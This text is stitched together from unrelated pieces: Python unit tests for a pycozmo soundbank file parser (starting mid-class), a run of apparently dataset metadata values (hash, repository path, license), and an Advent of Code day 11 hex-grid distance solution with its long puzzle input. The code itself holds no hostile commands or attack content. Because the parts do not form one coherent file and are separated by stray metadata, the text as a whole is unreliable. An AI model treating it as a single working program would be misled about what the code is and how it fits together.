        self.assertEqual(soundbank.version, 120)
        self.assertEqual(soundbank.data_offset, -1)
        self.assertEqual(len(soundbank.objs), 0)

    def test_data_section(self):
        f = io.BytesIO(self.HEADER + b"DATA\0\0\0\0")
        soundbank = self._new_reader().load_file(f, "test")
        # The DATA payload begins exactly where parsing stopped.
        self.assertEqual(soundbank.data_offset, f.tell())

    def test_data_index_empty(self):
        soundbank = self._load(self.HEADER + b"DIDX\0\0\0\0")
        self.assertEqual(len(soundbank.objs), 0)

    def test_data_index_invalid(self):
        # DIDX declares a 0xff-byte payload but no bytes follow.
        with self.assertRaises(pycozmo.audiokinetic.exception.AudioKineticIOError):
            self._load(self.HEADER + b"DIDX\xff\0\0\0")

    def test_data_index(self):
        # One 12-byte DIDX entry: file id 1, offset 2, length 3.
        soundbank = self._load(
            self.HEADER + b"DIDX\x0c\0\0\0\x01\0\0\0\x02\0\0\0\x03\0\0\0")
        self.assertEqual(len(soundbank.objs), 1)
        file = soundbank.objs[1]
        self.assertIsInstance(file, pycozmo.audiokinetic.soundbank.File)
        self.assertEqual(file.soundbank_id, soundbank.id)
        self.assertEqual(file.id, 1)
        self.assertEqual(file.offset, 2)
        self.assertEqual(file.length, 3)

    def test_hirc_empty(self):
        soundbank = self._load(self.HEADER + b"HIRC\x04\0\0\0\0\0\0\0")
        self.assertEqual(len(soundbank.objs), 0)

    def test_hirc_invalid(self):
        # HIRC declares more payload than the stream contains.
        with self.assertRaises(pycozmo.audiokinetic.exception.AudioKineticIOError):
            self._load(self.HEADER + b"HIRC\xff\0\0\0\xff\0\0\0")

    def test_event(self):
        soundbank = self._load(
            self.HEADER +
            b"HIRC\x15\0\0\0\x01\0\0\0\x04\x0c\0\0\0\x01\0\0\0\x01\0\0\0\x02\0\0\0")
        self.assertEqual(len(soundbank.objs), 1)
        event = soundbank.objs[1]
        self.assertIsInstance(event, pycozmo.audiokinetic.soundbank.Event)
        self.assertEqual(event.soundbank_id, soundbank.id)
        self.assertEqual(event.id, 1)
        self.assertEqual(event.name, "")
        self.assertEqual(len(event.action_ids), 1)
        self.assertEqual(event.action_ids[0], 2)

    def test_event_action(self):
        soundbank = self._load(
            self.HEADER +
            b"HIRC\x14\0\0\0\x01\0\0\0\x03\x0b\0\0\0\x01\0\0\0\x03\x04\xdd\xcc\xbb\xaa\0")
        self.assertEqual(len(soundbank.objs), 1)
        action = soundbank.objs[1]
        self.assertIsInstance(action, pycozmo.audiokinetic.soundbank.EventAction)
        self.assertEqual(action.soundbank_id, soundbank.id)
        self.assertEqual(action.id, 1)
        self.assertEqual(action.scope, 3)
        self.assertEqual(action.type, 4)
        self.assertEqual(action.reference_id, 0xaabbccdd)

    def test_sfx(self):
        soundbank = self._load(
            self.HEADER +
            b"HIRC\x1e\0\0\0\x01\0\0\0\x02\x15\0\0\0\x01\0\0\0\x01\0\0\0\x02\x03\0\0\0\x04\0\0\0\x01\0\0\0")
        self.assertEqual(len(soundbank.objs), 1)
        sfx = soundbank.objs[1]
        self.assertIsInstance(sfx, pycozmo.audiokinetic.soundbank.SFX)
        self.assertEqual(sfx.soundbank_id, soundbank.id)
        self.assertEqual(sfx.id, 1)
        self.assertEqual(sfx.name, "")
        self.assertEqual(sfx.location, 2)
        self.assertEqual(sfx.file_id, 3)
        self.assertEqual(sfx.length, 4)
        self.assertEqual(sfx.type, 1)
| 46.706767
| 119
| 0.633129
| 1,038
| 6,212
| 3.732177
| 0.080925
| 0.155911
| 0.181208
| 0.171399
| 0.819566
| 0.75271
| 0.727414
| 0.708312
| 0.693598
| 0.681466
| 0
| 0.121152
| 0.194784
| 6,212
| 132
| 120
| 47.060606
| 0.653339
| 0
| 0
| 0.5
| 0
| 0.12069
| 0.216068
| 0.20029
| 0
| 0
| 0.00322
| 0
| 0.362069
| 1
| 0.103448
| false
| 0
| 0.025862
| 0
| 0.137931
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a26d42f799f99e7095be3f0c3901520eec0d8829
| 24,371
|
py
|
Python
|
11/solution.py
|
AlecRosenbaum/adventofcode2017
|
9214a64db77492790d30bbd22e835535d05abb25
|
[
"MIT"
] | null | null | null |
11/solution.py
|
AlecRosenbaum/adventofcode2017
|
9214a64db77492790d30bbd22e835535d05abb25
|
[
"MIT"
] | null | null | null |
11/solution.py
|
AlecRosenbaum/adventofcode2017
|
9214a64db77492790d30bbd22e835535d05abb25
|
[
"MIT"
] | null | null | null |
"""
Day 11 challenge
"""
import attr
import math
from functools import reduce
@attr.s
class Offset(object):
    """A position on the hex grid as fractional horizontal/vertical offsets."""

    horizontal = attr.ib(default=0)
    vertical = attr.ib(default=0)

    def __add__(self, other):
        """Component-wise vector addition; returns a new Offset."""
        return Offset(
            horizontal=self.horizontal + other.horizontal,
            vertical=self.vertical + other.vertical,
        )

    def absolute_offset(self):
        """Euclidean distance from the origin.

        (abs() before squaring is redundant for real numbers, so it is
        omitted; the result is bit-identical to the original.)
        """
        return math.sqrt(self.horizontal ** 2 + self.vertical ** 2)
# Unit moves for the six hex-grid directions.  A pure north/south step
# changes the vertical coordinate by 1; each diagonal step changes both
# coordinates by half a cell, so opposite directions cancel exactly.
DIRECTIONS = {
    "nw": Offset(horizontal=-.5, vertical=.5),
    "n": Offset(vertical=1),
    "ne": Offset(horizontal=.5, vertical=.5),
    "se": Offset(horizontal=.5, vertical=-.5),
    "s": Offset(vertical=-1),
    "sw": Offset(horizontal=-.5, vertical=-.5),
}
def solution_part_one(arg):
    """Return the length of the shortest hex-grid walk back to the origin
    from the position reached by the comma-separated steps in *arg*."""
    steps = list(map(DIRECTIONS.get, arg.split(",")))
    position = sum(steps, Offset())
    shortcut = []
    # Greedy walk home: at each step take whichever direction leaves the
    # smallest remaining Euclidean distance (first minimum wins on ties,
    # matching dict insertion order).
    while position.absolute_offset():
        best_dir = None
        best_dist = None
        for name, delta in DIRECTIONS.items():
            dist = (position + delta).absolute_offset()
            if best_dir is None or dist < best_dist:
                best_dir = name
                best_dist = dist
        position += DIRECTIONS[best_dir]
        shortcut.append(best_dir)
    return len(shortcut)
def solution_part_two(arg):
    """Return the greatest distance (in steps) from the origin that is
    ever reached while following the comma-separated steps in *arg*."""
    steps = list(map(DIRECTIONS.get, arg.split(",")))

    def shortest_path_len(position):
        # Same greedy walk-back as solution_part_one, but only the step
        # count is needed, so no path list is built.
        count = 0
        while position.absolute_offset():
            best_dir = None
            best_dist = None
            for name, delta in DIRECTIONS.items():
                dist = (position + delta).absolute_offset()
                if best_dir is None or dist < best_dist:
                    best_dir = name
                    best_dist = dist
            position += DIRECTIONS[best_dir]
            count += 1
        return count

    # Evaluate every prefix of the walk with a running sum instead of
    # materializing all prefix positions via reduce().
    farthest = 0
    position = Offset()
    for step in steps:
        position = position + step
        farthest = max(farthest, shortest_path_len(position))
    return farthest
if __name__ == "__main__":
puzzle_input = """s,s,sw,se,s,nw,nw,ne,n,ne,n,n,n,n,n,n,n,ne,n,ne,ne,se,ne,n,ne,n,n,ne,se,sw,se,s,se,se,se,se,s,se,se,s,se,se,nw,se,se,se,s,s,nw,s,s,se,nw,s,n,s,nw,s,s,s,s,s,s,s,s,s,s,s,sw,s,s,s,s,s,sw,sw,s,sw,s,nw,sw,sw,s,sw,ne,sw,sw,s,se,sw,sw,sw,sw,sw,sw,sw,nw,sw,sw,sw,se,sw,nw,nw,sw,sw,sw,s,sw,nw,se,nw,se,nw,sw,nw,nw,se,n,sw,s,s,s,nw,sw,sw,nw,se,nw,sw,sw,sw,nw,sw,sw,nw,nw,nw,nw,ne,n,nw,nw,ne,nw,nw,nw,nw,nw,se,nw,nw,n,nw,nw,nw,sw,n,nw,nw,nw,nw,n,s,nw,ne,nw,s,nw,nw,nw,n,nw,nw,nw,nw,nw,nw,s,sw,n,n,nw,nw,n,n,nw,nw,n,nw,n,n,nw,n,s,n,nw,ne,n,nw,n,nw,n,n,n,n,se,s,n,s,n,s,n,n,n,nw,n,s,n,n,n,n,n,ne,n,n,n,n,s,n,n,n,n,sw,n,n,n,nw,n,n,n,n,nw,se,n,ne,n,n,ne,n,ne,ne,n,n,n,n,ne,n,n,nw,n,n,n,n,ne,se,se,ne,ne,ne,n,ne,n,ne,ne,nw,ne,ne,n,n,n,ne,ne,ne,n,ne,nw,n,s,ne,ne,ne,ne,ne,n,s,ne,ne,ne,n,ne,ne,ne,sw,ne,ne,ne,s,n,ne,ne,n,ne,ne,ne,ne,ne,se,ne,ne,se,ne,ne,ne,ne,se,ne,se,ne,nw,nw,sw,s,n,ne,ne,ne,ne,ne,sw,ne,ne,ne,sw,ne,ne,ne,ne,sw,se,ne,ne,ne,ne,se,s,se,s,nw,ne,ne,n,se,ne,ne,ne,sw,ne,s,s,nw,se,nw,ne,s,ne,se,ne,n,ne,n,s,n,ne,ne,s,ne,se,se,ne,sw,nw,s,n,nw,n,se,ne,se,se,sw,ne,ne,sw,se,se,se,se,sw,ne,se,s,ne,ne,n,se,ne,sw,ne,ne,se,se,nw,se,ne,ne,nw,sw,se,s,s,se,se,se,s,se,nw,se,ne,se,se,se,se,se,se,se,sw,nw,se,se,se,se,se,se,sw,se,sw,ne,se,se,se,se,se,se,se,se,s,se,se,se,se,se,se,ne,se,se,s,sw,s,se,se,se,se,se,se,se,s,se,sw,se,se,n,s,se,s,ne,se,se,se,s,se,s,se,se,ne,se,se,sw,s,se,se,se,se,nw,se,n,ne,s,s,nw,se,se,s,se,n,se,se,s,se,se,s,se,se,ne,se,se,se,s,s,sw,s,s,se,s,se,s,se,s,se,se,se,s,se,s,nw,s,s,se,se,se,se,sw,sw,s,se,s,se,se,s,n,se,se,se,se,s,se,se,s,se,se,se,sw,s,s,s,se,se,s,s,se,s,s,se,s,s,n,s,nw,s,n,s,sw,s,nw,s,s,se,se,sw,s,s,s,sw,se,s,n,s,se,n,s,se,se,se,s,s,s,se,ne,s,se,n,se,s,se,se,s,ne,sw,se,s,s,se,s,s,s,s,s,s,s,s,se,s,nw,s,s,s,s,s,s,s,s,s,s,s,ne,ne,s,s,s,s,s,s,s,s,s,ne,ne,s,s,s,s,s,s,s,s,nw,s,s,se,sw,s,sw,s,s,nw,s,s,s,s,s,s,s,s,s,n,ne,se,s,s,s,s,n,se,s,sw,s,sw,sw,sw,s,s,sw,s,s,s,nw,sw,s,s,s,s,s,ne,sw,s,s,sw,s,s,s,s,s,s,sw,s,s,se,s,s,sw,n,sw,s,s,sw,s,s,s,s,s,sw,s,ne,s,s,s
,s,sw,ne,s,ne,n,sw,s,s,s,sw,s,sw,nw,s,s,ne,sw,sw,nw,s,s,sw,sw,s,ne,s,s,sw,se,s,s,sw,s,s,sw,s,sw,sw,s,s,s,s,sw,sw,sw,s,n,ne,s,ne,s,sw,s,se,s,sw,sw,s,sw,sw,sw,sw,s,s,s,s,se,s,sw,sw,sw,sw,n,s,sw,s,s,sw,sw,s,s,n,sw,s,sw,sw,ne,sw,sw,s,sw,sw,sw,sw,sw,s,s,sw,se,sw,sw,sw,sw,s,s,sw,s,sw,sw,nw,sw,sw,se,sw,s,s,nw,nw,s,s,sw,sw,s,n,s,sw,sw,se,s,sw,sw,ne,sw,sw,sw,sw,sw,ne,sw,s,sw,sw,n,sw,sw,sw,sw,s,sw,sw,sw,sw,sw,n,nw,s,sw,s,s,n,ne,sw,sw,sw,sw,n,sw,se,sw,sw,s,se,sw,sw,sw,sw,sw,sw,s,ne,ne,ne,sw,sw,sw,ne,s,sw,sw,sw,sw,nw,s,sw,sw,s,s,sw,sw,n,nw,nw,sw,sw,sw,se,nw,nw,sw,s,sw,sw,sw,sw,sw,sw,sw,sw,sw,n,sw,sw,sw,nw,nw,se,sw,sw,sw,sw,sw,ne,sw,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,nw,s,sw,sw,se,sw,s,sw,sw,nw,nw,nw,sw,sw,nw,sw,se,ne,sw,sw,sw,sw,ne,sw,sw,nw,sw,se,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,sw,n,nw,sw,sw,sw,s,sw,sw,nw,n,s,sw,n,nw,nw,sw,sw,nw,sw,sw,se,sw,sw,nw,sw,sw,s,sw,nw,sw,nw,sw,nw,nw,nw,sw,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,s,sw,nw,nw,ne,n,nw,sw,sw,nw,sw,sw,nw,nw,nw,sw,sw,sw,ne,s,sw,nw,nw,sw,nw,sw,s,nw,n,nw,sw,sw,nw,nw,sw,nw,nw,n,sw,nw,sw,nw,sw,n,sw,nw,sw,sw,sw,sw,n,sw,n,nw,nw,s,sw,se,sw,sw,nw,n,sw,sw,sw,n,sw,nw,sw,ne,nw,sw,sw,s,n,nw,sw,nw,nw,nw,sw,sw,sw,nw,nw,ne,sw,s,sw,nw,n,sw,sw,sw,nw,ne,ne,sw,nw,nw,sw,s,s,sw,sw,nw,ne,sw,nw,sw,nw,nw,sw,sw,sw,sw,nw,nw,s,se,nw,sw,nw,ne,s,nw,nw,ne,sw,nw,nw,n,nw,nw,sw,sw,sw,nw,nw,nw,sw,nw,nw,n,sw,sw,nw,s,n,sw,nw,nw,sw,nw,n,nw,nw,nw,nw,nw,nw,sw,sw,n,n,sw,sw,nw,nw,nw,nw,ne,nw,nw,nw,sw,nw,nw,nw,nw,ne,nw,nw,nw,nw,n,nw,nw,nw,s,nw,nw,sw,nw,s,nw,ne,ne,nw,nw,sw,nw,nw,nw,nw,sw,nw,se,sw,nw,sw,nw,nw,ne,nw,n,nw,nw,sw,nw,nw,nw,sw,nw,ne,s,nw,nw,sw,s,nw,sw,sw,nw,nw,nw,sw,s,nw,nw,nw,nw,se,nw,s,nw,nw,nw,se,ne,ne,nw,nw,nw,nw,nw,sw,nw,ne,ne,nw,nw,nw,nw,nw,nw,nw,nw,nw,sw,nw,nw,nw,ne,nw,nw,s,nw,nw,ne,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,nw,nw,nw,ne,nw,n,nw,nw,ne,n,nw,sw,nw,n,nw,n,sw,nw,ne,s,se,n,ne,se,nw,ne,nw,ne,nw,ne,nw,nw,nw,n,nw,nw,nw,nw,nw,nw,nw,ne,nw,s,se,nw,n,n,nw,ne,nw,nw,nw,nw,ne,nw,nw,s,nw,nw,nw,nw,nw,n,nw,nw,nw,nw,nw,n,nw,nw,s,nw,nw,nw,nw,nw,sw
,nw,nw,nw,nw,nw,n,nw,nw,nw,nw,nw,sw,n,nw,nw,nw,nw,nw,nw,nw,s,nw,se,n,n,n,nw,se,nw,nw,s,s,nw,nw,n,nw,nw,s,nw,nw,nw,se,nw,nw,nw,se,nw,nw,nw,nw,se,nw,nw,nw,nw,nw,n,nw,n,ne,nw,nw,nw,se,ne,nw,nw,nw,n,nw,nw,ne,n,n,nw,nw,sw,nw,nw,nw,nw,se,nw,n,s,nw,nw,n,n,nw,se,n,nw,nw,nw,n,nw,nw,nw,n,nw,se,n,se,sw,s,n,s,nw,nw,nw,nw,n,n,s,nw,nw,se,nw,nw,se,nw,n,n,nw,n,se,nw,n,n,nw,n,nw,n,nw,nw,n,nw,n,s,nw,nw,nw,nw,ne,ne,se,sw,nw,n,n,nw,s,n,nw,nw,n,n,nw,n,nw,nw,nw,nw,nw,n,nw,n,n,sw,n,se,nw,n,n,nw,n,nw,nw,n,s,sw,nw,ne,nw,n,sw,nw,nw,n,nw,sw,s,nw,n,n,nw,se,n,nw,n,ne,n,nw,nw,n,nw,nw,n,nw,n,nw,nw,nw,n,se,sw,nw,nw,nw,sw,nw,nw,nw,nw,se,n,n,ne,n,nw,nw,n,nw,nw,n,sw,n,se,nw,nw,n,n,n,nw,n,nw,n,nw,n,ne,n,n,nw,n,n,n,nw,se,sw,n,sw,n,nw,nw,n,n,n,se,nw,sw,ne,n,se,nw,nw,n,n,n,n,n,n,nw,n,n,nw,sw,nw,n,sw,n,n,se,sw,n,n,n,nw,sw,nw,n,n,n,n,nw,n,n,nw,n,s,n,n,sw,n,nw,ne,s,nw,ne,n,n,n,ne,s,n,n,n,n,n,n,se,nw,nw,n,n,nw,n,n,s,se,n,nw,n,n,n,n,n,n,nw,n,n,n,nw,nw,nw,n,n,n,nw,nw,sw,n,se,n,s,n,n,n,n,n,n,ne,n,se,n,n,n,se,n,nw,n,nw,n,n,n,n,n,n,n,nw,n,n,n,n,n,n,ne,n,n,nw,n,n,sw,n,nw,n,n,sw,n,n,n,nw,se,n,n,n,nw,n,s,n,n,n,n,n,n,n,s,n,n,n,n,nw,n,n,sw,sw,nw,n,nw,nw,sw,n,n,n,n,n,n,n,n,n,n,n,s,n,n,n,n,nw,n,n,n,n,n,n,n,s,n,nw,n,sw,nw,ne,n,nw,n,sw,n,n,n,n,n,ne,n,nw,n,n,n,n,n,n,n,ne,n,n,n,n,ne,n,n,n,n,ne,n,n,n,n,ne,n,n,s,n,n,se,n,n,n,n,n,n,n,nw,n,ne,nw,sw,ne,nw,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,ne,n,n,se,n,ne,n,ne,n,n,n,n,ne,n,ne,se,s,ne,nw,se,n,n,n,n,se,n,n,ne,s,n,nw,n,nw,nw,n,n,n,n,n,n,n,n,n,s,n,n,n,s,n,nw,n,n,n,n,n,n,n,n,n,n,n,n,ne,ne,n,sw,n,se,n,n,n,n,n,n,n,se,n,ne,n,ne,n,n,n,n,n,sw,n,n,s,nw,n,n,n,ne,ne,n,n,n,ne,n,n,se,n,n,n,n,ne,n,n,n,s,n,se,ne,n,n,n,n,n,n,n,n,s,ne,s,nw,n,ne,s,ne,n,n,n,n,ne,n,n,n,n,n,n,n,n,n,ne,n,se,ne,n,ne,ne,ne,ne,se,n,n,ne,n,n,n,n,nw,ne,sw,ne,n,n,ne,se,n,n,n,n,se,n,n,n,ne,n,se,ne,ne,n,s,nw,n,ne,n,n,nw,n,n,ne,n,ne,n,sw,n,se,n,ne,nw,ne,ne,n,n,n,ne,n,ne,nw,n,s,n,n,n,n,ne,n,n,ne,n,nw,n,n,n,ne,n,s,n,n,n,n,n,ne,ne,n,sw,n,ne,n,n,sw,ne,n,ne,ne,n,n,ne,ne,ne,n,ne,ne,ne,n,ne,sw,n,n,ne,ne,ne,se,n,ne,ne,ne,n,nw,n,ne,n,n,n,ne,n
,n,n,n,n,ne,ne,n,ne,s,nw,ne,n,ne,ne,ne,n,n,n,n,nw,n,n,ne,ne,ne,n,ne,n,ne,ne,n,ne,ne,nw,ne,nw,n,n,ne,se,ne,se,ne,n,nw,n,n,s,n,se,ne,ne,n,ne,n,ne,s,n,n,sw,ne,ne,se,n,ne,n,n,n,n,sw,ne,ne,nw,n,n,ne,ne,ne,n,ne,n,sw,ne,ne,ne,ne,n,ne,se,ne,sw,n,n,n,ne,ne,sw,ne,ne,ne,n,ne,ne,n,ne,se,ne,s,nw,n,sw,n,ne,n,n,n,n,ne,n,sw,ne,ne,nw,n,ne,se,ne,ne,ne,ne,n,ne,ne,n,ne,n,ne,ne,ne,n,s,s,ne,ne,ne,s,ne,ne,ne,sw,n,n,ne,n,s,ne,n,n,nw,n,se,sw,ne,ne,ne,s,n,n,ne,ne,n,ne,ne,nw,ne,ne,ne,s,se,ne,ne,ne,n,ne,nw,n,ne,ne,sw,n,n,ne,ne,ne,n,ne,ne,se,ne,ne,n,ne,ne,ne,sw,s,n,n,n,se,n,s,ne,ne,ne,sw,ne,ne,se,ne,ne,ne,ne,ne,n,s,se,ne,ne,ne,n,ne,sw,se,s,ne,n,ne,ne,n,n,n,ne,n,ne,ne,se,ne,ne,n,ne,ne,ne,ne,ne,s,ne,ne,ne,nw,ne,ne,ne,ne,ne,n,ne,s,ne,ne,ne,n,ne,sw,n,n,n,ne,ne,n,ne,s,n,n,n,ne,ne,n,ne,ne,ne,sw,se,sw,ne,ne,s,ne,nw,ne,nw,se,nw,n,ne,se,n,ne,ne,ne,ne,ne,s,ne,ne,ne,ne,ne,n,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,se,ne,ne,ne,sw,ne,ne,ne,ne,n,ne,s,ne,s,ne,ne,n,ne,se,ne,ne,nw,n,ne,ne,ne,s,ne,sw,ne,n,ne,ne,n,ne,ne,ne,ne,ne,ne,n,ne,ne,ne,ne,ne,se,n,ne,ne,ne,ne,sw,ne,n,ne,se,ne,ne,ne,se,se,ne,sw,n,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,sw,ne,ne,ne,sw,n,n,ne,ne,n,ne,ne,ne,sw,ne,n,ne,ne,ne,se,ne,ne,nw,nw,sw,ne,ne,ne,ne,sw,ne,se,ne,n,ne,ne,ne,nw,ne,ne,ne,ne,ne,ne,sw,ne,ne,nw,ne,ne,ne,ne,ne,ne,ne,ne,sw,ne,ne,s,sw,ne,ne,s,sw,sw,ne,ne,ne,nw,ne,n,se,ne,ne,ne,ne,n,ne,nw,ne,ne,n,se,ne,ne,ne,ne,sw,ne,ne,s,ne,s,ne,ne,ne,ne,ne,ne,ne,nw,ne,ne,ne,se,ne,ne,ne,ne,se,ne,ne,sw,ne,s,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,sw,n,ne,ne,nw,se,ne,ne,ne,ne,se,ne,sw,ne,ne,n,se,ne,ne,se,ne,sw,nw,ne,ne,ne,ne,ne,ne,s,ne,se,sw,ne,s,ne,se,se,se,ne,ne,s,ne,ne,s,ne,se,ne,nw,s,ne,se,ne,ne,ne,sw,ne,se,ne,ne,ne,sw,ne,ne,ne,ne,nw,ne,ne,nw,ne,ne,s,ne,ne,se,ne,ne,nw,ne,ne,se,se,se,ne,se,ne,se,se,ne,ne,s,ne,ne,ne,ne,ne,ne,ne,ne,ne,n,ne,ne,ne,ne,ne,ne,ne,s,se,ne,sw,ne,ne,se,ne,ne,ne,ne,s,ne,se,ne,ne,se,n,n,ne,se,s,ne,s,ne,se,nw,ne,se,ne,ne,se,ne,se,se,ne,ne,se,ne,ne,ne,n,se,ne,ne,ne,ne,s,se,se,n,ne,se,se,ne,ne,se,ne,se,se,ne,ne,sw,ne,ne,ne,ne,ne,ne,nw,se,ne,se,ne,se,ne,s,n
e,ne,sw,ne,ne,ne,ne,ne,s,se,ne,ne,s,se,ne,ne,ne,nw,ne,ne,ne,se,ne,ne,ne,ne,se,ne,ne,ne,se,ne,ne,se,n,s,ne,ne,ne,se,s,n,se,se,ne,sw,ne,ne,n,ne,se,n,se,n,s,n,s,ne,se,ne,ne,ne,ne,n,ne,se,sw,se,ne,se,nw,ne,ne,ne,se,se,ne,ne,ne,ne,ne,ne,ne,ne,nw,ne,n,s,ne,ne,ne,ne,ne,se,se,se,se,sw,s,n,ne,s,ne,ne,sw,se,se,ne,ne,ne,ne,ne,ne,se,se,s,ne,se,ne,nw,n,ne,se,se,ne,se,ne,ne,se,se,se,ne,ne,sw,se,nw,se,nw,se,se,se,se,ne,n,n,ne,se,se,ne,ne,se,ne,ne,se,ne,sw,ne,se,ne,n,se,nw,sw,ne,ne,se,ne,se,ne,ne,se,ne,se,ne,ne,ne,se,ne,se,se,n,nw,ne,ne,ne,ne,sw,n,ne,ne,ne,nw,ne,se,se,ne,ne,s,nw,n,ne,ne,ne,ne,ne,ne,ne,se,ne,sw,se,ne,s,n,ne,ne,se,ne,se,se,ne,se,ne,se,se,ne,se,se,se,ne,ne,ne,ne,se,ne,ne,nw,ne,ne,se,ne,s,se,ne,se,ne,ne,ne,ne,n,se,ne,se,se,ne,ne,ne,nw,ne,se,se,nw,ne,se,se,ne,sw,ne,ne,ne,n,ne,ne,ne,n,se,ne,se,ne,n,n,se,ne,se,se,se,ne,se,se,sw,se,ne,se,ne,sw,sw,ne,ne,ne,s,n,ne,ne,nw,ne,n,se,se,se,se,ne,nw,ne,ne,ne,se,ne,se,n,n,se,n,se,se,se,se,se,ne,sw,ne,se,ne,se,se,se,ne,sw,se,s,se,se,ne,se,se,se,n,ne,se,se,ne,ne,ne,ne,se,se,ne,se,se,ne,se,ne,ne,se,se,nw,se,se,ne,se,sw,se,ne,n,ne,se,se,se,nw,se,se,se,ne,se,ne,se,se,ne,se,se,ne,ne,se,se,sw,ne,se,se,sw,se,se,s,ne,ne,se,ne,s,ne,se,se,ne,se,nw,n,se,se,s,se,ne,se,ne,ne,sw,ne,ne,n,se,s,n,ne,se,se,ne,nw,ne,ne,se,se,ne,sw,ne,ne,ne,se,sw,ne,se,se,ne,n,ne,se,nw,se,se,se,ne,se,ne,ne,ne,s,ne,nw,ne,ne,ne,se,se,se,nw,se,ne,se,se,se,ne,se,ne,se,se,se,ne,se,se,se,n,se,ne,ne,se,se,se,se,sw,ne,se,se,se,ne,se,nw,n,ne,ne,ne,sw,n,se,n,se,se,n,ne,se,se,ne,se,ne,se,nw,se,se,se,s,sw,ne,se,sw,se,se,se,ne,ne,se,ne,se,se,se,se,ne,se,se,ne,se,se,ne,se,ne,se,se,se,ne,se,ne,ne,se,s,ne,ne,nw,se,ne,n,ne,se,se,ne,se,n,ne,ne,se,ne,se,se,se,ne,se,se,ne,ne,nw,ne,s,se,se,se,se,se,sw,nw,n,se,se,s,se,se,se,nw,se,n,nw,se,ne,ne,se,nw,se,se,se,se,se,se,ne,se,se,se,se,ne,se,se,ne,se,se,se,se,ne,se,se,se,se,ne,ne,nw,se,se,se,se,se,se,s,se,se,se,n,se,ne,ne,ne,se,se,se,se,ne,se,se,ne,se,se,se,se,se,se,se,sw,se,ne,ne,s,se,se,ne,se,se,se,ne,ne,se,se,se,se,se,se,se,s,sw,se,ne,se,se,s
e,se,se,se,se,n,se,sw,se,se,se,ne,se,se,se,se,se,s,ne,nw,se,se,se,se,se,sw,se,ne,sw,se,ne,se,se,ne,se,ne,n,ne,se,se,ne,se,ne,nw,nw,se,se,se,se,se,se,se,se,se,se,sw,se,se,se,se,se,nw,se,n,se,se,ne,se,se,nw,se,se,se,se,se,ne,nw,nw,se,se,se,se,ne,se,se,se,ne,ne,se,se,se,se,se,se,se,se,se,se,se,sw,s,se,se,ne,nw,se,se,se,se,se,se,sw,sw,se,ne,sw,nw,se,se,se,se,se,n,se,se,ne,se,se,se,nw,se,ne,se,se,se,s,se,se,n,se,se,ne,se,s,se,ne,se,se,se,nw,se,se,n,se,s,n,se,se,se,nw,se,s,sw,se,ne,se,se,se,nw,se,sw,se,se,sw,s,se,n,ne,sw,se,n,nw,se,ne,se,se,se,se,se,ne,se,se,se,se,se,se,se,se,n,se,se,se,ne,se,se,se,sw,se,nw,se,se,ne,se,se,se,se,n,ne,se,se,se,n,se,se,se,se,se,se,se,s,s,se,se,se,s,ne,se,se,se,se,se,se,se,se,se,se,se,se,se,n,n,se,se,se,se,se,se,se,se,se,s,sw,se,se,se,n,nw,se,se,se,se,ne,ne,se,n,se,se,sw,ne,sw,se,se,ne,se,se,se,se,se,se,se,se,se,n,se,nw,se,se,se,sw,s,se,se,se,se,se,se,se,se,ne,s,se,se,se,nw,s,se,n,se,se,se,s,sw,se,se,se,se,nw,ne,se,se,se,ne,s,se,sw,se,se,se,se,se,se,s,se,s,se,sw,se,ne,s,se,se,nw,se,se,nw,n,se,se,se,nw,nw,se,se,se,se,se,nw,s,se,se,ne,se,se,se,se,se,se,se,sw,se,se,se,se,se,se,nw,se,se,s,se,se,se,se,s,s,se,se,se,s,se,se,se,s,s,n,se,se,se,se,n,n,se,sw,nw,se,s,se,nw,se,s,nw,nw,se,s,se,se,se,se,se,se,sw,nw,se,se,s,se,se,se,se,se,se,n,n,ne,se,s,s,se,se,se,se,se,se,s,se,se,s,se,se,n,se,se,s,se,s,se,s,se,sw,se,se,sw,se,ne,se,sw,se,se,se,s,nw,se,ne,n,se,se,nw,se,ne,se,se,se,s,se,se,nw,se,s,se,se,se,nw,se,se,sw,s,se,s,se,se,nw,s,se,se,s,se,se,s,se,se,se,se,se,sw,s,se,se,s,sw,nw,ne,nw,se,nw,se,s,se,se,se,se,se,s,se,se,se,se,sw,s,sw,se,se,se,s,sw,sw,s,n,se,s,se,nw,se,se,se,ne,se,se,se,se,s,se,se,s,nw,s,se,s,nw,se,se,se,se,se,n,s,se,ne,n,se,se,nw,se,s,se,n,se,nw,s,s,s,se,nw,s,s,se,s,se,se,nw,s,se,s,se,se,se,se,n,se,se,s,se,se,se,se,s,s,se,s,se,se,s,se,s,n,se,n,se,se,s,se,s,se,se,s,s,se,se,s,se,se,se,se,s,s,s,se,s,nw,s,se,se,se,ne,nw,se,se,se,se,se,se,n,se,se,se,se,se,se,nw,se,se,se,s,s,nw,se,ne,se,s,se,ne,se,se,nw,se,se,se,sw,n,se,sw,se,se,nw,ne,s,se,sw,se
